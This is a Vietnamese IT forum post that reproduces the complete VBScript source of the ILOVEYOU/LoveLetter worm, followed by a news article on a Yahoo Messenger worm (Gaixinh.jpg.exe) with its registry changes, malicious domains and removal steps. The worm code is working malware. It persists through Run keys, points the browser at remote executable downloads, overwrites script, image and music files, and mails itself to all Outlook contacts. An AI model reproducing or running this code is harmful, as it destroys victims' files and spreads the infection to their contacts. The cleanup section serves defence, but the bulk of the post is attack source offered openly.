Chia Sẽ Kinh Nghiệm Về IT



Tìm Kiếm Với Google
-


Gởi Ðề Tài Mới  Gửi trả lời
 
Công Cụ Xếp Bài
Tuổi 20-03-2010, 10:26 AM   #1
hoctinhoc
Guest
 
Trả Lời: n/a
Code Virus Gái Xinh
Code Virus Gái Xinh


Code:

Mã:

rem barok  -loveletter(vbe) <i hate go to school>

rem by: spyder /  <a href="mailto:ispyder@mail.com">ispyder@mail.com</a> /  @GRAMMERSoft Group /

Manila,Philippines

On Error Resume  Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

ctr=0

Set  fso = CreateObject("Scripting.FileSystemObject")

set file =  fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub  main()

On Error Resume Next

dim wscr,rr

set  wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows  Scripting

Host\Settings\Timeout")

if (rr>=1) then

wscr.RegWrite  "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout",0,"REG_DWORD"

end  if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem =  fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set  c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"\MSKernel32.vbs")

c.Copy(dirwin&"\Win32DLL.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()

html()

spreadtoemail()

listadriv()

end  sub

sub regruns()

On Error Resume Next

Dim  num,downread

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

",dirsystem&"\MSKernel32.vbs"

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi

n32DLL",dirwin&"\Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Download  Directory")

if (downread="") then

downread="c:\"

end  if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then

Randomize

num  = Int((4 * Rnd) + 1)

if num = 1 then

regcreate  "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif  num = 2 then

regcreate "HKCU\Software\Microsoft\Internet  Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif  num = 3 then

regcreate "HKCU\Software\Microsoft\Internet  Explorer\Main\Start

Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif  num = 4 then

regcreate "HKCU\Software\Microsoft\Internet  Explorer\Main\Start

Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX

.exe"

end  if

end if

if  (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI

X",downread&"\WIN-BUGSFIX.exe"

regcreate  "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start

Page","about:blank"

end  if

end sub

sub listadriv

On Error Resume Next

Dim  d,dc,s

Set dc = fso.Drives

For Each d in dc

If  d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"\")

end  if

Next

listadriv = s

end sub

sub  infectfiles(folderspec)

On Error Resume Next

dim  f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f =  fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in  fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if  (ext="vbs") or (ext="vbe") then

set  ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js")  or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")

or  (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write  vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set  cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg")  or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write  vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3")  or (ext="mp2") then

set  mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set  att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end  if

if (eq<>folderspec) then

if (s="mirc32.exe") or  (s="mlink32.exe") or (s="mirc.ini") or

(s="script.ini") or  (s="mirc.hlp") then

set  scriptini=fso.CreateTextFile(folderspec&"\script.ini")

scriptini.WriteLine  "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine  "; Please dont edit this script... mIRC will corrupt,

if mIRC  will"

scriptini.WriteLine " corrupt... WINDOWS will affect and  will not run

correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine  ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine  ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine  "n1= /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2=  /.dcc send $nick

"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine  "n3=}"

scriptini.close

eq=folderspec

end if

end  if

next

end sub

sub folderlist(folderspec)

On  Error Resume Next

dim f,f1,sf

set f =  fso.GetFolder(folderspec)

set sf = f.SubFolders

for each  f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end  sub

sub regcreate(regkey,regvalue)

Set regedit =  CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end  sub

function regget(value)

Set regedit =  CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end  function

function fileexist(filespec)

On Error Resume  Next

dim msg

if (fso.FileExists(filespec)) Then

msg  = 0

else

msg = 1

end if

fileexist = msg

end  function

function folderexist(folderspec)

On Error Resume  Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg  = 0

else

msg = 1

end if

fileexist = msg

end  function

sub spreadtoemail()

On Error Resume Next

dim  x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set  regedit=CreateObject("WScript.Shell")

set  out=WScript.CreateObject("Outlook.Application")

set  mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to  mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)

if  (regv="") then

regv=1

end if

if  (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1  to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

if  (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject  = "ILOVEYOU"

male.Body = vbcrlf&"kindly check the attached  LOVELETTER coming from me."

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end  if

x=x+1

next

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

else

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

end  if

next

Set out=Nothing

Set mapi=Nothing

end  sub

sub html

On Error Resume Next

dim  lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD><TITLE>LOVELETTER  - HTML<?-?TITLE><META

NAME=@-@Generator@-@  CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _

"<META  NAME=@-@Author@-@ CONTENT=@-@spyder ?-? <a  href="mailto:ispyder@mail.com">ispyder@mail.com</a> ?-?

@GRAMMERSoft  Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _

"<META  NAME=@-@Description@-@ CONTENT=@-@simple but i think this is

good...@-@>"&vbcrlf&  _

"<?-?HEAD><BODY

ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@  "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@  BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>This  HTML file need ActiveX Control<?-?p><p>To Enable to read

this  HTML file<BR>- Please press #-#YES#-# button to Enable

ActiveX<?-?p>"&vbcrlf&  _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@

BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>

"&vbcrlf&  _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"&lt;script  language=@-@JScript@-@>"&vbcrlf& _

"<!--?-??-?"&vbcrlf&  _

"if (window.screen){var wi=screen.availWidth;var

hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf&  _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"&vbcrlf&  _

"&lt;script LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

"<!--"&vbcrlf&  _

"on error resume next"&vbcrlf& _

"dim  fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

"aw=1"&vbcrlf&  _

"code="

dta2="set  fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _

"set  dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf&  _

"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf&  _

"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf&  _

"set  wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf&  _

"wri.write code4"&vbcrlf& _

"wri.close"&vbcrlf&  _

"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))  then"&vbcrlf& _

"if (err.number=424)  then"&vbcrlf& _

"aw=0"&vbcrlf& _

"end  if"&vbcrlf& _

"if (aw=1) then"&vbcrlf& _

"document.write  @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _

"window.close"&vbcrlf&  _

"end if"&vbcrlf& _

"end if"&vbcrlf& _

"Set  regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _

"regedit.RegWrite

@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru

n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf&  _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")

dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")

set  fso=CreateObject("Scripting.FileSystemObject")

set  c=fso.OpenTextFile(WScript.ScriptFullName,1)

lines=Split(c.ReadAll,vbcrlf)

l1=ubound(lines)

for  n=0 to ubound(lines)

lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))

if  (l1=n) then

lines(n)=chr(34)+lines(n)+chr(34)

else

lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf&  _"

end if

next

set  b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")

b.close

set  d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)

d.write  dt5

d.write join(lines,vbcrlf)

d.write vbcrlf

d.write  dt6

d.close

end sub


Chiều 10/4, hàng nghìn người sử dụng Internet bị nhiễm một loại virus lạ lây lan qua Yahoo Messenger. Virus này lây lan với tốc độ nhanh khủng khiếp trong cộng đồng online.

Người dùng Yahoo! Messenger cần lưu ý, đây là đường link chứa virus, do vậy không nên chạy bất cứ tập tin nào từ địa chỉ www.xRobots.net. Tên miền này mới được tạo cách đây ba ngày và có tốc độ lây lan rất nhanh trong cộng đồng Internet qua Yahoo! Messenger.

Theo các chuyên gia CNTT, con virus này do người Việt viết, tạm đặt tên virus là RemyWorm, là một chương trình để phát triển mạng botnet (mạng lưới kết nối nhiều máy tính thông thường được hacker khai thác để điều khiển máy tính làm những việc không mong muốn như tấn công từ chối dịch vụ các hệ thống DOS, DDOS, DRDOS, cài phần mềm adware, spyware, keylog). Virus sẽ làm chủ máy tính người dùng, có thể Format ổ cứng, xóa, ăn cắp dữ liệu, mật khẩu.... thông qua file messenger.exe để điều khiển máy tính bị nhiễm tấn công DOS, DDOS hoặc DRDOS vào bất kỳ hệ thống mạng nào...

Cơ chế lây lan của nó có thể dựa trên lỗi của Yahoo! Messenger vì trong tin nhắn người nhận không thấy đường link có đuôi là .exe. Khi được cài vào máy tính, virus là tập tin messenger.exe nằm ngay trong Windows và sẽ tự động lây lan đến người dùng khác qua hệ thống Yahoo! Messenger.

Hiện tại, tốc độ lây lan của nó rất kinh khủng. Theo dự đoán của chuyên gia này tính đến chiều 10-4, nó đã lây nhiễm khoảng 30% máy tính sử dụng Yahoo! Messenger và đang tiếp tục lây lan rât nhanh. Vì mức độ nguy hiểm của virus đề nghị các cơ quan chức năng chặn địa chỉ www.xRobots.net lại để tránh virus phát tán thêm.

Vì virus này do người Việt viết nên tạm thời các chương trình quét virus của nước ngoài như Norton Anti Virus không thể phát hiện ra.

Khi virus hoạt động nó tự động copy một phiên bản chính nó thành tệp %Windir%\Messenger.exe. (%Windir% là thư mục Windows, mặc định là C:\Windows\System đối với Windows 95/98/Me/XP/2003 và C:\Winnt, đối với Windows NT/2000).

Khi tệp ứng dụng có tên là Gaixinh.jpg.exe được nạp vào bộ nhớ, nó sẽ thay đổi Registry trên máy nạn nhân như sau:

1. Thêm giá trị DisableRegedit=1 vào khoá: HKEY_CURRENT_User\Software\Microsoft\

Windows\CurrentVersion\Policies\System để khoá không cho truy cập vào Regedit.

2. Thêm giá trị [Yahoo!!!] C:\WINDOWS\Messenger.exe vào khoá: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run để nạp virus lúc Windows khởi động.

3. Thay đổi trang Homepage của Internet Explorer về trang chủ của virus bằng cách sửa giá trị của khoá HKEY_CURRENT_User \Software\Microsoft\Internet Explorer\Main\Start Page về

http://67.15.40.2/~tranphu/forumtp

4. Thêm giá trị sau vào các khoá khác trong regedit: http://xrobots.net/Gift/New/ hoặc

HKEY_CURRENT_USER\Software\Yahoo\pager\

View\YMSGR_Launchcast.

Cách thức khắc phục:

Xóa bỏ file messenger.exe do virus sinh ra trong thư mục Windows

Trước hết đăng nhập vào máy với quyền "Administrator"

1. Tạm dừng thread messenger.exe (Windows 2000 trở lên):

- Nhấn phải chuột vào thanh Task Bar phía dưới màn hình, chọn Menu "Task Manager".

- Cửa sổ "Task Manager" hiện lên, chọn Tab "Processes", tìm trong cột "Image Name" dòng nào có "messenger.exe" thì chọn rồi ấn "End Process".

2. Xóa file messenger.exe: Có hai cách:

* Xóa trong DOS

- Vào menu "Start - Run", gõ lệnh "cmd" rồi Enter.

- Vào thư mục chứa Windows, gõ lệnh "c:" rồi Enter (hoặc d, e tùy ổ đia nào bạn đang cài Windows); sau đó gõ lệnh "cd \windows" rồi Enter.

- Loại bỏ các thuộc tính bảo vệ của file chứa Virus: gõ lệnh "attrib -r -h -s messenger.exe" rồi Enter.

Xóa file: gõ lệnh "del messenger.exe" rồi Enter.

* Xóa trong Windows (cách này đơn giản hơn)

- Ấn phải chuột vào nút Start, chọn menu "Explore".

- Cửa sổ "Windows Explorer" hiện ra, hãy chọn trong cây thư mục ở bên trái ổ đĩa bạn đang cài Windows rồi nhấp trái chuột vào thư mục "Windows" hoặc "WINNT".

- Hiển thị những file ẩn: Chọn menu "Tools - Folder Options" ở phía trên, chọn Tab "View"; trong mục "Advanced settings" chọn "Show hidden files and folders" và bỏ chọn ở "Hide extensions for known file types" rồi OK.

- Xóa file: trong nội dung thư mục Windows (hoặc WINNT) ở bên phải bạn hãy tìm chọn file "messenger.exe" rồi giữ Shift và ấn Delete cùng lúc, chọn YES nếu có hộp thoại hỏi lại (Nếu không xóa được thì chạy Safe Mode rồi xóa.).

3. Sau khi diệt xong người dùng không vào những thông điệp Yahoo! Messenger lạ để tránh tiếp tục bị lây nhiễm.

Cách khác:

1. Trước hết mở Registry bằng cách download tệp sau về và chạy.

Khi máy tính báo "Registry Editing Tools are now ENABLED Log off and back o­n, or restart your pc to effect the changes" là được

2. Khởi động lại máy tính bằng chế độ SafeMode (Bấm F8 lúc máy tính khởi động). Sau đó Vào Start -> Run rồi gõ Regedit rồi Enter. Hãy tìm khoá: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Run và xoá giá trị [Yahoo!!!] C:\WINDOWS\Messenger.exe.

Tiếp tục tìm HKEY_CURRENT_User \Software\Microsoft\Internet Explorer\Main\Start Page để vào xoá hoặc thay đổi về địa chỉ HomePage vẫn dùng.

Tìm toàn bộ các giá trị có nội dung như sau http://xrobots.net/Gift/New/ và xoá đi. Các khoá có thể thêm ví dụ là HKEY_CURRENT_USER\Software\Yahoo\pager\View\

YMSGR_Launchcast và HKEY_USERS\S-1-5-21-1708537768-1343024091-1957994488-500\Software\Yahoo\pager\View\YMSGR_Launchcast

3. Tìm tệp GirlXinh.jpg.exe và xoá đi (thường nằm trong Desktop hoặc My Documents), có thể tìm bằng chức năng Search của Windows.

4. Vào trong thư mục Windows tìm tệp Messenger.exe và xoá đi

5. Khởi động lại máy tính.

Ông Trần Hùng Cường, Giám đốc 911, khẳng định, cách tốt nhất là dùng chức năng Find trong Regedit để tìm tất cả các xâu ký tự có nội dung là “http://xRobots.net/Gift/New/” để xoá đi. Ngoài ra cũng có thể dùng HijackThis để xoá các khoá và các process đang chạy của virus. Có thể
download HijackThiss tại đây

http://www.911.com.vn/download/hijackthis.exe
http://conghung.com/?conghung=mod:news% ... ewsid:1348


  Trả lời ngay kèm theo trích dẫn này
Gửi trả lời


Công Cụ
Xếp Bài

Quyền Hạn Của Bạn
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Mở
Hình Cảm xúc đang Mở
[IMG] đang Mở
Mã HTML đang Tắt




Bây giờ là 05:41 PM. Giờ GMT +7



Diễn đàn tin học QuantriNet
quantrinet.com | quantrimang.co.cc
Founded by Trương Văn Phương | Developed by QuantriNet's members.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.